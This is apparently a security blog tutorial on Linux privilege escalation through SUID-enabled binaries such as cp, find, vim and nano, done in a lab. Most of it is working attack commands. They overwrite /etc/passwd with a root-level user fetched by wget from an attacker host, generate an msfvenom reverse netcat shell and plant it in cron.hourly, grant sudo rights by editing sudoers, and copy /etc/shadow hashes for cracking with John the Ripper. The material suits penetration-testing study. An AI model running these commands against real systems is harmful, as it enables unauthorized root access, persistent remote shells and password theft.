Privilege Escalation

Linux Privilege Escalation using SUID Binaries

In our previous article we have discussed “Privilege Escalation in Linux using etc/passwd file” and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving CTF challenges we always check suid permissions for any file or command for privilege escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation. You can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link 1:  Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of the Linux users to whom you allow or restrict all three permissions. Take a look at the following image.

Hence it is clear that the maximum number of bit is used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set chmod 755, then it will look like as rwxr-xr-x.

But when special permission is given to each user it becomes SUID, SGID, and sticky bits. When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID) and  if other users are allowed to create or delete any file inside a directory then sticky bits “1” is set to that directory.

 

What is SUID Permission?

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing the target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges. 

How to set suid?

Basically, you can change the permission of any file either using the “Numerical” method or “Symbolic” method. As result, it will replace x from s as shown in the below image which denotes especial execution permission with the higher privilege to a particular file/command. Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before read/write/execution operation.

 

If you execute ls -al with the file name and then you observe the small ‘s’ symbol as in the above image, then its means SUID bit is enabled for that file and can be executed with root privileges.

How to Find SUID Files

By using the following command you can enumerate all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null
  • /denotes  start from the top (root) of the file system and find every directory
  • -perm denotes search for the permissions that follow
  • -u=sdenotes look for files that are owned by the root user
  • -typestates the type of file we are looking for
  • denotes a regular file, not the directories or special files
  • 2 denotes to the second file descriptor of the process, i.e. stderr (standard error)
  • > means redirection
  • /dev/null is a special filesystem object that throws away everything written into it.

HOW SUID helps in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non- root users to escalate root access privileges if the SUID bit is enabled. There are some famous Linux / Unix executable commands that can allow privilege escalation: Bash, Cat, cp, echo, find, Less, More, Nano, Nmap, Vim and etc

Visit here more: //gtfobins.github.io/#+sudo

Let’s get deep through practical work. First, create a user that should not be a sudo group user. Here, we have added user “ignite” whose UID is 1001 and GID is 1001 and therefore ignite is a non- root user.

adduser ignite

Privilege Escalation using the copy command

If suid bit is enabled for the cp command, which is used to copy the data, it can lead to an escalation privilege to gain root access.

For example, suppose you (system admin) want to give cp command SUID permission. Then you can follow the steps below to identify its location and current permission, after which you can enable SUID bit by changing permission.

which cp
ls -al /bin/cp
chmod u+s /bin/cp

1st Method

On the other hand, start your attacking machine and first compromise the target system and then move to the privilege escalation phase. Suppose I successfully log into the victim’s machine via ssh and access the non-root user terminal. Then by using the following command, you can list all binaries with SUID permission.

find / -perm -u=s -type f 2>/dev/null

In the above image, you can observe that it is showing so many files but we are interested in /bin/cp file. Because now we can copy /etc/passwd file for reading user list. Therefore I copy /passwd file inside the HTML directory.

cp /etc/passwd /var/www/html

On other hands, we have generated a new encrypted password: pass123 using OpenSSL passwd

We have copied the /passwd file into the web directory, i.e. /var/www/html, so I can open it through the web browser and then copy the entire contents of the /passwd file into a text file and then add our own user with root UID, GID, and directory.

In our previous article, we have already discussed how to add a user /etc/passwd using the OpenSSL passwd utility.

Run Python HTTP server for transferring our edited passwd file into target’s machine.

python -m SimpleHTTPServer 80

As we all know, the /tmp directory has all permission to create or delete any file, so we have downloaded our passwd file inside it. After it is downloaded, we have copied the /tmp/passwd data to /etc/passwd as a result, it will overwrite the original passwd file.

cd /tmp
wget //192.168.1.108/passwd
cp passwd /etc/passwd

With the help of tail command, we ensured that our user “hack” is either the part of /etc/passwd file. Since we have added our own user with root privileges let’s get into the root directory.

su hack
whoami

And Yessssssss !! This is an incredible way to escalated root privilege.

2nd Method

Similarly, if SUID bit is enabled for the cp command, we can also transfer our backdoor to the target system. Here, we have generated netcat backdoor for reverse connection using the msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the above highlighted code and paste it into a text file by editing #! /bin/bash, then ready to transfer it to the target system, I saved it as raj.sh.

Now we are all aware of the Linux crontab utility that runs files hourly, daily, weekly and monthly, so I copied raj.sh to /etc/cron.hourly, so it will run raj.sh after one hour.

cp raj.sh /etc/cron.hourly/
ls -al /etc/cron.hourly/

Other hands we started Netcat listener in a new terminal and as the hour past it gives reverse connection of the target’s system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if SUID bit is ON. You can try your own way to escalated root privilege using cp command.

Privilege Escalation Using Find Command

Similarly, we can escalate root privilege if SUID bit is ON for /usr/bin/find.

For example, suppose you (system admin) want to give SUID permission for Find command. Then you can use which command to identify its location and current permission after then you can enable SUID bit by changing permission.

which find
ls -al /usr/bin/find
chmod u+s /usr/bin/find

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command, you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled to find command which means we can execute any command within find command. To do so first we create an empty file “raj” and then run the whoami command as shown below.

touch raj
find raj -exec "whoami" \;

If an attacker successfully enumerated SUID bit for /usr/bin/find then it will allow him to execute any malicious command such netcat bin/bash shell or may fetch important system information for privilege escalation.

Privilege Escalation Using Vim editor

Similarly, we can escalate root privilege if SUID bit is ON for Vim editor. For example, suppose you (system admin) want to give SUID permission for Vim editor. Then you can use “which” command to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim
ls -al /usr/bin/vim
ls -al /etc/alternatives/vim
chmod u+s /usr/bin/vim.basic

You will found vim.basic through symlinking as shown in the below image.

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command, you can enumerate all binaries who’s having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /usr/bin/vim.basic and hence now we can edit any file which through vim that can be editable only by sudo or root user.

As we know ignite is non-root user who has least permissions, since vim has SUID permission, therefore, we can edit the sudoers file through it and can change permissions for user “ignite”. So we open sudoers file by typing visudo command and give all permission to user “ignite” as shown in the image.

ignite   ALL=(ALL:ALL) ALL

Now let access root directory as shown in below image.

sudo -l
sudo bash
id

 Great!! This trick also works superbly for privilege escalation.

Privilege Escalation using Saved Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either PHP, Python or C language script. Suppose you (system admin) want to give SUID permission to a C language script which will provide bash shell on execution.

So here we have coded a c program which will call system for bash shell and saved it as “asroot.c”.

Then create a rootshell directory inside /bin directory and copy the asroot.c file in rootshell directory then run gcc compiler for compilation.

mkdir /bin/rootshell
cd /bin/rootshell
cp /home/raj/Desktop/asroot.c .
ls
gcc asroot.c -o shell
chmod u+s shell
ls -al shell

Now again compromise the target’s system and use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files but we are interested in /bin/rootshell/shell. So we move into /bin/rootshell directory and run the “shell” script, as result, we get root access as shown below.

cd /bin/rootshell/shell
./shell
id

Hence we saw how we can escalate root privilege if SUID bit is enabled for any script, although it is not possible to get such a script that calls bash shell if you found any script with SUID permission then using above techniques you can modify the contents of that script to get the bash shell.

Privilege Escalation using Nano Editor

Similarly, we can escalate root privilege if SUID bit is ON for nano editor. For example, suppose you (system admin) want to give SUID permission for nano editor. Then you may follow the below steps to identify its location and current permission so that you can enable SUID bit by changing permission.

which nano
ls -al /bin/nano
chmod u+s /bin/nano

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command, you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /bin/nano and now let’s open /etc/passwd file to edit own user as done above by using OpenSSL passwd.

On other hands, I have generated a new encrypted password: 123 using OpenSSL passwd

Now open passwd file with nano editor and add your own user as done above. Here you can observe I have created demo user with an encrypted password in the victim’s system.

nano /etc/passwd

Since we have added our own user with root privileges let’s get into the root directory.

su demo
id

2nd Method

If suid bit is enabled for /bin/nano then we can steal the password from inside /etc/shadow file. So after compromising target’s machine we had opened shadow file in nano editor and copy the encrypted password set for user: raj.

Now paste above copy code into a text file and saved as a hash on the desktop, after then used John the ripper to decode it as shown below. It has given raj: 123 as password, now try to login into target’s system through raj account.

So Today we have demonstrated how the SUID permission can lead to privilege escalation even if it is allowed to a normal copy, cat, nano, vim and so commands and programs.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here